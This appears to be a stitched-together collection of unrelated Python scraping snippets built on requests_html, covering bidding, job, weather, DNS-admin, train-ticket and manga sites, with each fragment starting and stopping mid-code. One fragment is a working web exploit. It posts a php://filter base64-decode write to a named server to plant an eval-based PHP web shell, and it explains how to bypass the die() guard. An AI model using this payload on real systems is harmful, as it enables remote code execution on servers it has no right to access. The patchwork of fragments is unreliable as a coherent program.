            '二次', 'GIS', 'SVG', '加密', '除湿', '寻甸', '元谋', '风向', '运输']  # 电机
        self.sel_title = 'tbody tr td a'
        self.sel_content = 'div.xq_nr'
        self.sel_pubdate = 'div.xiab_1 > span'
        self.session = HTMLSession()  # the session object records cookies automatically
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) '
                          'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 '
                          'Safari/537.36',
            'referer': 'https://www.chinabidding.cn/',
        }
        self.data = {}
        self.t = time.time()
        self.stamp = str(round(self.t * 1000))  # millisecond timestamp
        self.now = time.strftime('%Y-%m-%d', time.localtime(self.t))  # today's date

    def get_response(self, url):
        r = self.session.get(url, params=self.data, headers=self.headers)
        return r

    def chk_login(self):
        response = self.get_response(self.loginurl)  # fetch the login page (carries the captcha randomID)
        userid = response.html.find('div.deng_nr_1 > input', first=True).attrs['value']
        self.data = {'t': self.stamp, 'randomID': userid}
        yzmpic = self.get_response(self.yzmurl)  # fetch and save the captcha image
        with open('captcha.jpg', 'wb') as f:
            f.write(yzmpic.content)
        os.system('start captcha.jpg')  # display the captcha image
        yzm = input('输入验证码:')
        logindata = {
            'name': '联合动力',
            'password': '******',
            'url': '',
            'yzm': yzm,
            'randomID': userid,
        }
        rep = self.session.post(self.loginchkurl, data=logindata, headers=self.headers)
        # print(rep, rep.text)
        # response = self.session.post(self.loginurl, data=logindata, headers=self.headers)
        # print(response.text)
        # On success the site redirects to the home page automatically.
        if rep.text == '5':
            print('登录失败')
            return False
        else:
            print('登录成功')
            return True

    def get_result(self):
        start = time.time()
        if self.chk_login():  # fetch the captcha, save it, prompt for it, and log in
            for i in range(1, self.page):
                searchurl = self.url + '/search/searchgj/zbcg'
                self.data = {
                    'areaid': '',
                    'keywords': '风电',
                    'time_start': self.now,
                    'time_end': self.now,
                    'page': i,
                    'search_type': 'CONTEXT',
                    'categoryid': '',
                    'rp': '30',
                    'table_type': '',
                    'b_date': 'week',
                }
                response = self.get_response(searchurl)
                item_list = response.html.find(self.sel_title)
                # print(item_list)
                for item in item_list:
                    try:
                        href = self.url + item.attrs['href']
                        title = item.attrs['title']
                    except Exception:
                        continue
                    # title = item.text
                    # print(title)
                    if self.chk_title(title):  # drop titles that hit the exclusion list
                        if self.key_title1 in title or self.key_title2 in title:
                            response = self.get_response(href)
                            try:
                                content = response.html.find(self.sel_content, first=True).text
                                pubdate = response.html.find(self.sel_pubdate, first=True).text
                            except Exception:
                                continue
                            # print(content)
                            if self.key_content in content:
                                webbrowser.open(href)
                                print(href, pubdate, title)
                                time.sleep(1)
        end = time.time() - start
        print('耗时:%.2f秒' % end)
        print(time.strftime("%H:%M:%S"))  # current time

    def chk_title(self, title):
        for word in self.exp_list:
            if word in title:
                # print(word)
                return False
        # print(title)
        return True
"""
Attempt at web scraping Piazza

This does not work, because Piazza uses Javascript to retrieve post data.
"""
# session = requests.Session()
# s = session.post("https://piazza.com/class", data=userdata.data, cookies=userdata.cookies)
# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1494"
# s = session.get(url)
# soup = BeautifulSoup(s.content, "html.parser")
# print(soup.get_text())

session = HTMLSession()
r = session.get("https://piazza.com/")
r = session.post("https://piazza.com/class", data=userdata.data)
page = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1")
page.html.render()
# BeautifulSoup needs the rendered markup string, not the HTML object itself.
soup = BeautifulSoup(page.html.html, "html.parser")
print(soup.get_text())

# data = '{"method":"content.get","params":{"cid":"khksgq944s2172","nid":"kek9zeb4r1g3ir","student_view":false}}'
# r = session.post('https://piazza.com/logic/api', data=userdata.data)
# soup = BeautifulSoup(r.html, "html.parser")
# print(soup.get_text())
# r = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1494")
# soup = BeautifulSoup(r.html.text, "html.parser")
# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1"
payload = {
    "staff_username": USER,
    "staff_password": PASSWORD,
}
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
}

# 0) GET - login - https://www.campingshop.pl/panel/auth/login
r = sess.get(LOGIN_WEBSITE, headers=headers)  # LOGIN_WEBSITE: http://www.campingshop.pl/panel/auth/login

# 1) POST - login - https://www.campingshop.pl/panel/auth/login with staff_username and staff_password
r = sess.post(LOGIN_WEBSITE, data=payload, headers=headers)
# I wanted to pass send_cookies_session=True here but get
# TypeError: render() got an unexpected keyword argument 'send_cookies_session',
# even though 'send_cookies_session' is in the docs:
# https://requests.readthedocs.io/projects/requests-html/en/latest/
r.html.render()
print(r.cookies.get_dict())  # no cookies ;(

# 2) GET - panel - https://www.campingshop.pl/panel
r = sess.get("https://www.campingshop.pl/panel", headers=headers)

# 3) GET - login - https://www.campingshop.pl/panel2/login
r = sess.get("https://www.campingshop.pl/panel2/login", headers=headers)
r.html.render()
print(r.cookies.get_dict())  # no cookies ;(

# To be completed
def search(self) -> list:
    """
    Performs actual scraping
    :return: list with resulting positions
    """
    post_data = {
        "_piref37_267288_37_267287_267287.next_page": "/vmsearch.do",
        "_piref37_267288_37_267287_267287.formtype": 3,
        "_piref37_267288_37_267287_267287.vmid": "",
        "_piref37_267288_37_267287_267287.nprokoho": "",
        "_piref37_267288_37_267287_267287.ndny": "",
        "_piref37_267288_37_267287_267287.nokres": "",
        "_piref37_267288_37_267287_267287.nsort": "",
        "_piref37_267288_37_267287_267287.ref": [],
        "_piref37_267288_37_267287_267287.kiosek": 0,
        "_piref37_267288_37_267287_267287.send": 'A',
        "_piref37_267288_37_267287_267287.ok": "Search",
        "_piref37_267288_37_267287_267287.profese": [self.profession],  # e.g. 'developer'
        "_piref37_267288_37_267287_267287.obor": "",
        "_piref37_267288_37_267287_267287.dopravaObec": "",
        "_piref37_267288_37_267287_267287.firma": "",
        "_piref37_267288_37_267287_267287.ico": "",
        "_piref37_267288_37_267287_267287.okres": self.district_code,
        "_piref37_267288_37_267287_267287.zaDny": "",
        "_piref37_267288_37_267287_267287.mzdaOd": "",
        "_piref37_267288_37_267287_267287.typMzdy": 'M',
        "_piref37_267288_37_267287_267287.sort": 2
    }
    cleanr = re.compile(r'<.*?>')
    session = HTMLSession()
    response = session.post(self.url, data=post_data)
    tree = html.fromstring(response.text)
    position_elements = tree.cssselect('table.OKtbodyThDistinct tbody')
    for position_element in position_elements:
        # get details from lines using regex match
        position = {}
        occupation = position_element.cssselect('h4.vmProfese')[0].text
        position['occupation'] = occupation
        info_lines = position_element.cssselect('tr')
        for info_line in info_lines:
            if 'Company' in str(html.tostring(info_line)):
                company_list = info_line.cssselect('b')
                company = ''
                if len(company_list):
                    company = company_list[0].text
                position['company'] = company
            elif 'Report to' in str(html.tostring(info_line)):
                reportto_element = info_line.cssselect('td')[2]
                reportto_str = str(html.tostring(reportto_element, encoding='unicode'))
                report_to = re.sub(cleanr, '', reportto_str)
                position['report_to'] = report_to
            elif 'Comment on vacancy:' in str(html.tostring(info_line)):
                description_element = info_line.cssselect('td')[0]
                description_str = str(html.tostring(description_element, encoding='unicode'))
                description = re.sub(cleanr, '', description_str)
                position['description'] = description
        # print(f'company: {company}')
        self.positions.append(position)
    # print(self.positions)
    return self.positions
from requests_html import HTMLSession
import json

session = HTMLSession()
r = session.get("https://cervezapedia.com/beer/rate")
token = r.cookies["XSRF-TOKEN"]
print(token)
r = session.post("https://cervezapedia.com/beer/rate", headers={"X-XSRF-TOKEN": token})
datos = json.loads(r.content)
# print(datos)
for cerveza in datos["data"]:
    print("-------------------------------------------------------")
    print("Código:", cerveza['externalId'], "Nombre:", cerveza['name'])
    r = session.post("https://cervezapedia.com/beer/byId",
                     headers={"X-XSRF-TOKEN": token},
                     json={"id": cerveza['externalId']})
    datos_cerveza = json.loads(r.content)["data"]
    # print(datos_cerveza)
    print("Pais: ", datos_cerveza["countrySpanishName"])
    print("Alcohol: ", datos_cerveza["alcohol"])
    print("Estilo: ", datos_cerveza["styleName"])
def check_pages(vk, config):
    # Log in
    url = 'https://catwar.su/ajax/login'
    user_agent_val = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \
                     'Chrome/90.0.4430.93 Safari/537.36 '
    session = HTMLSession()
    session.headers.update({'Referer': url})
    session.headers.update({'User-Agent': user_agent_val})
    session.post(url, {**catwar})
    heads = ('врачеватель', 'врачевательница', 'ученик врачевателя',
             'ученица врачевателя', 'советник', 'советница')
    elders = ('старейшина',)
    elects = ('избранник духов', 'избранница духов')
    guards = ('страж', 'стражница')
    hunters = ('охотник', 'охотница')
    futures = ('будущий охотник', 'будущая охотница', 'будущий страж', 'будущая стражница')
    others = ('котёнок', 'переходящий', 'переходящая')
    page_ids = {heads: 56490990, elders: 56591896, elects: 56846221,
                guards: 56807806, hunters: 56807807, futures: 56490171,
                others: 56808867}
    wrong_names, dels, not_position = [], [], []
    m_1, m_2, m_3 = '', '', ''
    for key, value in page_ids.items():
        # Fetch the wiki page source
        orig_page = vk_token.pages.get(**config, owner_id=-group_id,
                                       page_id=value, need_source=1)
        orig_page = orig_page['source']
        page = orig_page[(orig_page.find("{|") + 2):(orig_page.find("|}"))]
        vk_ids = [v[2:] for v in re.findall(r"id[0-9]+", page)]
        vk_names = [v[1:] for v in re.findall(r"\|[^ -][^0-9\]\]\[]+", page)]
        vk_dict = dict(zip(vk_ids, vk_names))
        ids = [v[1:] for v in re.findall(r"\|[0-9]+", page)]
        names = [v[1:] for v in re.findall(r"\[[А-яё ]+", page)]
        # Check the VK names
        for vk_key, vk_value in vk_dict.items():
            vk_name = vk.users.get(user_ids=vk_key, fields='first_name, last_name')[0]
            vk_name = vk_name['first_name'] + ' ' + vk_name['last_name']
            if vk_value != vk_name:
                wrong_names.append(f'{vk_value} — {vk_name}')
        # Check clan membership and position
        for id in ids:
            response = session.get(f'https://catwar.su/cat{id}')
            profile = response.content.decode("utf-8")
            soup = BeautifulSoup(profile, 'html.parser')
            position = soup.find('i')
            if not position:
                if id not in ('539719', '1068731'):
                    dels.append(f'{key[0]} — {id}')
            else:
                position = position.text
                position = re.match('[^i<>/]+', position).group()
                if position.lower() not in key:
                    not_position.append(f'{id} не {key[0]}, a {position}')
    for x in dels:
        m_1 = m_1 + x + '\n'
    for x in not_position:
        m_2 = m_2 + x + '\n'
    for x in wrong_names:
        m_3 = m_3 + x + '\n'
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Удалены или не в клане: {m_1}\n\n')
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие должности: {m_2}\n\n')
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие имена: {m_3}\n\n')
# https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
import pprint
from requests_html import HTMLSession

url = 'http://www.cduestc.cn:50007/'
# %36 decodes to '6', so the filter becomes convert.base64-decode
params = {"file": 'php://filter/write=convert.base%364-decode/resource=aa.php'}
data = {
    # Writes <?php @eval($_POST['cmd']) ?> into aa.php.
    # For a leading <?php exit(); prepend one 'a';
    # for a leading <?php die(); prepend two ('aa'),
    # so the surviving base64 characters pad out to a multiple of 4.
    'contents': 'aaPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4='
}
# proxies = {'http': 'http://localhost:8080'}
proxies = {}
s = HTMLSession()
res = s.post(url, params=params, data=data, proxies=proxies)
pprint.pprint(res.text)
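# A quick local check of the trick above (standalone sketch, not from the
# original post): the base64-decode filter drops characters outside the base64
# alphabet, so from "<?php die();" only "phpdie" (6 chars) survives; the two
# leading 'a's round that prefix up to 8 characters, letting the real payload
# decode on a clean 4-byte boundary.
import base64
import re

guard = '<?php die();'
payload = 'aaPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4='
kept = re.sub(r'[^A-Za-z0-9+/=]', '', guard + payload)
print(base64.b64decode(kept))  # junk bytes followed by: <?php @eval($_POST['cmd']) ?>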
class LostFilmParser:
    source_url = 'https://www.lostfilm.tv/'
    tv_shows_list_part_url = 'https://www.lostfilm.tv/ajaxik.php'
    part_step = 10

    def __init__(self):
        self.session = HTMLSession()
        self.news_data = self.session.get(self.source_url)

    def get_links(self):
        return self.news_data.html.links

    def get_title_en(self, href):
        try:
            result = search(r'/series/([^/]+)/', href)
            title_en = result.group(1)
            tv_show_link = self.source_url.rstrip('/') + result.group()
        except AttributeError:
            title_en = None
            tv_show_link = None
        return title_en, tv_show_link

    def get_new_shows_episodes(self):
        clear_data = []
        news_block = self.news_data.html.find('.new-movies-block', first=True)
        movies = news_block.find('a.new-movie')
        for movie in movies:
            title_en, show_link = self.get_title_en(movie.attrs['href'])
            clear_data.append({
                'title_ru': movie.attrs['title'],
                'title_en': title_en,
                'jpg': 'http:' + movie.find('img', first=True).attrs['src'],
                'season': movie.find('.title', first=True).text,
                'date': movie.find('.date', first=True).text,
                'episode_link': self.source_url.rstrip('/') + movie.attrs['href'],
                'tv_show_link': show_link,
            })
        return clear_data

    def load_part_list(self, step):
        url = self.source_url + 'ajaxik.php'
        request_data = self.session.post(
            url=url,
            data={'act': 'serial', 'o': step, 's': 3, 't': 0, 'type': 'search'})
        return json.loads(request_data.content)['data']

    def get_tv_shows_list(self):
        """Page through 10 -> 20 -> 30 -> ... until the server returns an empty list."""
        step = 0
        shows_list = []
        request_result = self.load_part_list(step)
        while request_result:
            for result in request_result:
                shows_list.append(result)
            step += self.part_step
            sleep(1)
            request_result = self.load_part_list(step)
        return shows_list
class Grabber:
    def __init__(self, d, f, t, p):
        self.date = d
        self.from_ = f
        self.to = t
        self.purpose_code = p
        self.s = HTMLSession()
        self.s.cookies = self.init_cookie()
        self.uuid = ''
        self.ticket = {}

    def init_cookie(self):
        cookie_jar = RequestsCookieJar()
        cookie_jar.set("route", "c5c62a339e7744272a54643b3be5bf64", domain="/")
        cookie_jar.set("JSESSIONID", "772931B953A48C762D39F27832447D2F", domain="/otn")
        cookie_jar.set("BIGipServerotn", "217055754.38945.0000", domain="/")
        return cookie_jar

    def check_ticket_info(self):
        def crawl_ticket_info():
            url = (
                f'https://kyfw.12306.cn/otn/leftTicket/queryZ?'
                f'leftTicketDTO.train_date={self.date}'
                f'&leftTicketDTO.from_station={self.from_}'
                f'&leftTicketDTO.to_station={self.to}&purpose_codes={self.purpose_code}'
            )
            r = self.s.get(url)
            tickets = []
            for line in r.json()['data']['result']:
                ls = line.split('|')
                if ls[0]:
                    tickets.append({
                        'secretstr': ls[0],
                        'train_num': ls[3],
                        'train_date': ls[13],
                        'start_at': ls[8],
                        'arrive_at': ls[9],
                        'seat_level_0': ls[32],
                        'seat_level_1': ls[31],
                        'seat_level_2': ls[30],
                        'sleeper_level_0': ls[21],
                        'sleeper_level_1': ls[23],
                        'motor_sleeper': ls[33],
                        'sleeper_level_2': ls[28],
                        'soft_seat': ls[27],
                        'hard_seat': ls[29],
                        'no_seat': ls[26]
                    })
            return tickets

        tickets = crawl_ticket_info()
        if not tickets:
            return
        for ticket in tickets:
            if ticket['train_num'] == 'G1002':
                self.order_ticket(ticket)
                return

    def submit_order_request(self, ticket):
        url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
        data = {
            'secretStr': urllib.parse.unquote(ticket['secretstr']),
            'train_date': dt.datetime.strptime(ticket['train_date'], '%Y%m%d').strftime('%Y-%m-%d'),
            'back_train_date': dt.datetime.today().strftime('%Y-%m-%d'),
            'tour_flag': 'dc',
            'purpose_codes': self.purpose_code,
            'query_from_station_name': sd[self.from_],
            'query_to_station_name': sd[self.to],
            'undefined': ''
        }
        r = self.s.post(url, data=data)

    def get_data(self):
        def parse_pts(html):
            tds = html.xpath('//tbody[@id="check_ticketInfo_id"]/tr/td')
            return (f'0,0,1,{tds[3].text},1,{tds[5].text},{tds[6].text},N',
                    f'{tds[3].text},1,{tds[5].text},1_')

        url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
        headers = {
            'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc',
            'Host': 'kyfw.12306.cn',
            'Origin': 'https://kyfw.12306.cn',
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        r = self.s.post(url, data={'_json_att': ''}, headers=headers)
        r.html.render(timeout=6, wait=6)
        # TODO: optimize
        print(r.text)
        html = lxml.etree.HTML(r.text)
        passenger_ticket_str, old_passenger_str = parse_pts(html)
        return {
            'REPEAT_SUBMIT_TOKEN': re.findall(r'var globalRepeatSubmitToken = \'(.*)\';', r.text)[0],
            'key_check_isChange': re.findall(r'\'key_check_isChange\':\'(.*)\',', r.text)[0],
            'leftTicketStr': re.findall(r'\'leftTicketStr\':\'(.*)\',', r.text)[0],
            '_json_att': '',
            'dwAll': 'N',
            'roomType': '00',
            'whatsSelect': '1',
            'seatDetailType': '000',
            'choose_seats': '',  # TODO: choose seat.
            'train_location': 'QX',  # can't understand.
            'purpose_codes': '00',
            'randCode': '',
            'passengerTicketStr': passenger_ticket_str,
            'oldPassengerStr': old_passenger_str,
        }

    def order_ticket(self, ticket):
        self.submit_order_request(ticket)
        # checkuser
        data = self.get_data()
        url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
        r = self.s.post(url, data=data)
        try:
            if r.status_code == 200:
                print('got !')
        except Exception:
            import traceback
            traceback.print_exc()

    def show_qr_code(self):
        """Show qrcode for login."""
        url = 'https://kyfw.12306.cn/otn/resources/login.html'
        self.s.get(url)
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/create-qr64',
                          data={'appid': 'otn'}).json()
        self.uuid = rjs['uuid']
        b64img = rjs['image']
        img = Image.open(BytesIO(base64.b64decode(b64img)))
        img.show()

    def check_qr_code(self):
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/checkqr',
                          data={'appid': 'otn', 'uuid': self.uuid}).json()
        return rjs['result_code'] != '2'

    def login(self):
        threading.Thread(target=self.show_qr_code).start()
        while self.check_qr_code():
            time.sleep(2)
        print('login success.')
class ScrapperINMET:
    def __init__(self):
        env_path = os.path.join(os.path.dirname(__file__), '..', 'env.ini')
        env_config = configparser.ConfigParser()
        env_config.read(env_path)
        self.user = env_config.get('login', 'user')
        self.password = env_config.get('login', 'password')
        self.base_url = "http://www.inmet.gov.br"
        self.session = HTMLSession(mock_browser=True)

    @staticmethod
    def is_logged_in(response: Response) -> bool:
        return 'Modulo de Estudo e Pesquisa' in response.text

    def login(self) -> bool:
        url = '/'.join([self.base_url, "projetos/rede/pesquisa/inicio.php"])
        self.session.get(url)
        payload = {
            'mUsuario': '',
            'mSenha': self.password,
            'mCod': self.user,
            'mGerModulo': 'PES',
            'btnProcesso': ' Acessar '
        }
        response = self.session.post(url, data=payload)
        response.raise_for_status()
        return self.is_logged_in(response)

    def get_dados(self, tipo_periodo: str, uf: str, cidade: str,
                  dtInicio: datetime.datetime, dtFim: datetime.datetime):
        self.login()
        if tipo_periodo == 'mes':
            url = '/'.join([self.base_url, "projetos/rede/pesquisa/form_mapas_mensal.php"])
            url_post = '/'.join([self.base_url, "projetos/rede/pesquisa/mapas_mensal_sem.php"])
        elif tipo_periodo == 'dia':
            url = '/'.join([self.base_url, "projetos/rede/pesquisa/form_mapas_c_diario.php"])
            url_post = '/'.join([self.base_url, "projetos/rede/pesquisa/mapas_c_diario.php"])
        else:
            raise NotImplementedError
        self.session.get(url)
        payload = {
            'mUsuario': self.user,
            'mRelRegiao': '',
            'mRelEstado': uf.upper(),
            'mRelDtInicio': dtInicio.strftime('%d/%m/%Y'),
            'mRelDtFim': dtFim.strftime('%d/%m/%Y'),
            'mGerModulo': 'PES',
            'mOpcaoAtrib15': '1',
            'btnProcesso': ' Pesquisa '
        }
        response = self.session.post(url_post, data=payload)
        pattern = cidade + r'.*href=([^\>]+) target'
        url_result = re.search(pattern, response.text, flags=re.IGNORECASE).group(1)
        response = self.session.get(url_result)
        rtext = response.html.xpath('.//pre')[0].full_text
        dados = re.search('(estacao;.+)', rtext, re.IGNORECASE | re.DOTALL).group(1)
        dados = dados.split('\n')
        head = dados[0].split(';')
        dados.pop(0)
        result = list()
        for dado in dados:
            values = dado.split(';')
            if len(values) != len(head):
                continue
            temp = dict()
            for k, v in zip(head, values):
                if k + v == "":
                    continue
                temp[k] = v
            result.append(temp)
        return result
class GratisDNS(object):
    BACKEND_URL = 'https://admin.gratisdns.com/'
    SUPPORTED_RECORDS = ('A', 'AAAA', 'CNAME', 'MX', 'TXT', 'SRV')

    def __init__(self, username: str, password: str):
        self.__session = HTMLSession()
        payload = {
            'action': 'logmein',
            'login': username,
            'password': password
        }
        response = self.__session.post(GratisDNS.BACKEND_URL, data=payload,
                                       allow_redirects=False)
        if response.status_code != requests.codes.found:
            # Unfortunately, GratisDNS doesn't use proper HTTP status
            # codes, but does use a redirect on successful login, so
            # assume anything else is an error.
            raise GratisDNSError(
                'Login response was not redirect. Possibly invalid username/password')

    def __get_domains(self, action: str, table_id: str) -> list:
        domains = []
        response = self.__session.get(GratisDNS.BACKEND_URL, params={'action': action})
        table = response.html.find(table_id, first=True)
        for domain in table.find('tr'):
            domain_change_link = domain.find('a', containing='Ændre', first=True)
            if domain_change_link:
                href = domain_change_link.attrs['href']
                query = parse_qs(urlparse(href).query)
                domains.append(query['user_domain'][0])
        return domains

    def __record_from_dict(self, record_type: str, record_entries: dict) -> Record:
        if record_type == 'A':
            return ARecord(record_entries.get('user_domain'),
                           record_entries['Hostname'],
                           record_entries['IPv4'],
                           id=record_entries.get('id'),
                           ttl=record_entries['TTL'])
        elif record_type == 'AAAA':
            return AAAARecord(record_entries.get('user_domain'),
                              record_entries['Hostname'],
                              record_entries['IPv6'],
                              id=record_entries.get('id'),
                              ttl=record_entries['TTL'])
        elif record_type == 'CNAME':
            raise NotImplementedError()
        elif record_type == 'MX':
            return MXRecord(record_entries.get('user_domain'),
                            record_entries['Hostname'],
                            record_entries['Exchanger'],
                            record_entries['Preference'],
                            id=record_entries.get('id'),
                            ttl=record_entries['TTL'])
        elif record_type == 'TXT':
            return TXTRecord(record_entries.get('user_domain'),
                             record_entries['Hostname'],
                             record_entries['Text'],
                             id=record_entries.get('id'),
                             ttl=record_entries['TTL'])
        elif record_type == 'SRV':
            raise NotImplementedError()
        raise NotImplementedError()

    def __record_change_query_from_column(self, column) -> dict:
        record_change_link = column.find('a', containing='Ændre', first=True)
        if record_change_link:
            href = record_change_link.attrs['href']
            query = parse_qs(urlparse(href).query)
            return {k: v[0] for k, v in query.items()}
        return {}

    def __get_records(self, html: HTML) -> dict:
        records = {}
        for entry in html.find('.dns-records'):
            record_type = entry.find('h2', first=True).element.text.strip()
            if record_type not in self.SUPPORTED_RECORDS:
                continue
            table = entry.find('table', first=True)
            headers = [h.text for h in table.find('thead', first=True).find(
                'tr', first=True).find('th')]
            record_entries = []
            for row in table.find('tbody', first=True).find('tr'):
                cols = row.find('td')
                entry = {}
                for i, h in enumerate(headers):
                    column = cols[i]
                    if h:
                        entry[h] = column.text
                    else:
                        record_change_link_query = self.__record_change_query_from_column(column)
                        if record_change_link_query:
                            entry['id'] = record_change_link_query['id']
                            entry['user_domain'] = record_change_link_query['user_domain']
                if entry:
                    record_entries.append(self.__record_from_dict(record_type, entry))
            if record_entries:
                records[record_type] = record_entries
        return records

    def create_record(self, domain, host, type, data, preference=None,
                      weight=None, port=None):
        raise NotImplementedError()

    def update_record(self, record: Record):
        if record.record_type not in self.SUPPORTED_RECORDS:
            raise NotImplementedError()
        form_data = vars(record)
        form_data['action'] = f'dns_primary_record_update_{record.record_type.lower()}'
        self.__session.post(GratisDNS.BACKEND_URL, data=form_data)

    def delete_record(self, domain, host, type=None, preference=None):
        raise NotImplementedError()

    def get_primary_domains(self):
        return self.__get_domains('dns_primarydns', '#primarydnslist')

    def get_secondary_domains(self):
        return self.__get_domains('dns_secondarydns', '#secondarydnslist')

    def get_primary_domain_details(self, domain: str):
        response = self.__session.get(GratisDNS.BACKEND_URL, params={
            'action': 'dns_primary_changeDNSsetup',
            'user_domain': domain
        })
        return self.__get_records(response.html)

    def create_primary_domain(self, domain):
        raise NotImplementedError()

    def create_secondary_domain(self, domain, master, slave='xxx.xxx.xxx.xxx'):
        raise NotImplementedError()

    def delete_primary_domain(self, domain):
        raise NotImplementedError()

    def delete_secondary_domain(self, domain):
        raise NotImplementedError()

    def import_from_axfr(self, domain, slave='127.0.0.1'):
        raise NotImplementedError()
def start(data):
    session = HTMLSession()
    url = "https://parivahan.gov.in/rcdlstatus/?pur_cd=101"
    res = session.get(url)
    # ----------------FORM EXTRACTION----------------
    soup = BeautifulSoup(res.html.html, "html.parser")
    details = {}
    form = soup.find_all("form")[0]
    action = form.attrs.get("action").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        input_value = input_tag.attrs.get("value", "")
        inputs.append({
            "type": input_type,
            "name": input_name,
            "value": input_value
        })
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    # -------------------Captcha---------------------
    captcha_src = soup.find_all("img")
    for i in captcha_src:
        if "Captcha" in i['src']:
            captcha_url = "https://parivahan.gov.in/" + i['src']
            print(captcha_url)
    # Currently the captcha is entered manually after visiting the printed link.
    # -------------------FORM FILLING-----------------
    data['form_rcdl:j_idt32:CaptchaID'] = input("Enter Captcha: ")
    submit_url = urljoin(url, details["action"])
    # print(submit_url)
    if details["method"] == "post":
        res = session.post(submit_url, data=data)
        # return res
    elif details["method"] == "get":
        res = session.get(submit_url, params=data)
        # return res
    # ----------Authorization-----------
    auth_cookie = res.cookies
    # ---------Data Extract-------------
    name_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[2]/td[2]'
    issue_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[2]/text()'
    expiry_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[3]/text()'
    vehicle_class_xpath = '//*[@id="form_rcdl:j_idt164_data"]/tr/td[2]'
    driving_num_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[5]/td[2]'
    url = 'https://parivahan.gov.in/rcdlstatus/vahan/rcDlHome.xhtml'
    response = requests.get(url, cookies=auth_cookie)
    byte_data = response.content
    source_code = html.fromstring(byte_data)
    # --------------CSV DUMP----------------------
    final_data = [
        ["Name"],
        ["Issue Date"],
        ["Expiry Date"],
        ["Vehicle Class"],
        ["Driving Licence Number"],  # fifth column; the loop below indexes final_data[4]
    ]
    name_list = source_code.xpath(name_xpath)
    issue_list = source_code.xpath(issue_xpath)
    expiry_list = source_code.xpath(expiry_xpath)
    class_list = source_code.xpath(vehicle_class_xpath)
    driv_num = source_code.xpath(driving_num_xpath)
    # print(tree[0].text_content())
    for i in range(len(name_list)):
        final_data[0].append(name_list[i].text_content())
        final_data[1].append(issue_list[i].text_content())
        final_data[2].append(expiry_list[i].text_content())
        final_data[3].append(class_list[i].text_content())
        final_data[4].append(driv_num[i].text_content())
    output_df = pd.DataFrame(final_data)
    output_df.to_csv("output.csv", index=True)
def download_manga(self, start_link, end_link=""):
    """Given a start link and end link from twistedhelscans.com, downloads all manga images."""
    next_link = start_link
    counter = 1
    # Deal with end link being first page
    if end_link.endswith('1'):
        end_link = end_link[:-6]
    # Initial page
    session = HTMLSession()
    page = session.post(start_link, data=dict(adult="true"))
    # Get title of manga
    try:
        title = gen_title(page)
    except Exception:
        self.queue.put("Could not find title. Website is not Twisted Hel Scan page?")
        return
    while next_link != end_link:
        # Open next page
        page = session.post(next_link, data=dict(adult="true"))
        # Check if end link is first page redirect
        if page.url == end_link:
            break
        self.queue.put(page.url)
        if not end_link:
            end_link = page.html.find('h1.hb.dnone', first=True).find(
                'a', first=True).attrs['href']
        # Find image link and vol. num
        try:
            volume = get_volume(page)
            image = page.html.find('div.inner', first=True).find(
                'img', first=True).attrs['src']
        except Exception:
            self.queue.put("Could not find image link. Website is not Twisted Hel Scan page?")
            return
        # Download the image
        image = session.get(image)
        # Make manga directory
        if not os.path.exists(title):
            try:
                os.mkdir(title)
            except IOError:
                self.queue.put("Could not make directory")
                return
        # Make volume directory; restart numbering for a new volume
        if not os.path.exists(title + "/" + volume):
            try:
                os.mkdir(title + "/" + volume)
            except IOError:
                self.queue.put("Could not make directory")
                return
            counter = 1
        # Write image to file
        self.write_image(image, title, volume, counter)
        counter += 1
        # Find next link
        next_link = page.html.find('div.inner', first=True).find(
            'a', first=True).attrs['href']
    self.queue.put("Done")
import sqlite3
import time
from requests_html import HTMLSession
# DB_NAME, ACCOUNT and PASSWORD are configuration constants defined elsewhere
# in this script.


def onQQMessage(bot, contact, member, content):
    if not bot.isMe(contact, member):
        if content == '.help' or '[@ME]' in content:
            bot.SendTo(
                contact,
                'Forward a [link] to add a red packet\n' +
                'Send [.1] to claim a red packet with a warm-up claim\n' +
                'Send [.11] to claim a red packet without one\n' +
                'Send [.2] to check how many are left\n' +
                'Send [.u1 link] to mark a link as used\n' +
                'Send [.u0 link] to mark a link as unused\n')
        elif content == '.stop':
            bot.SendTo(contact, 'The red-packet bot cannot be stopped, it seems')
            # bot.Stop()
        else:
            con = sqlite3.connect(DB_NAME)  # path is relative to the qqbot startup directory
            cur = con.cursor()
            table = 'hb'
            # SQLite does not have a separate Boolean storage class.
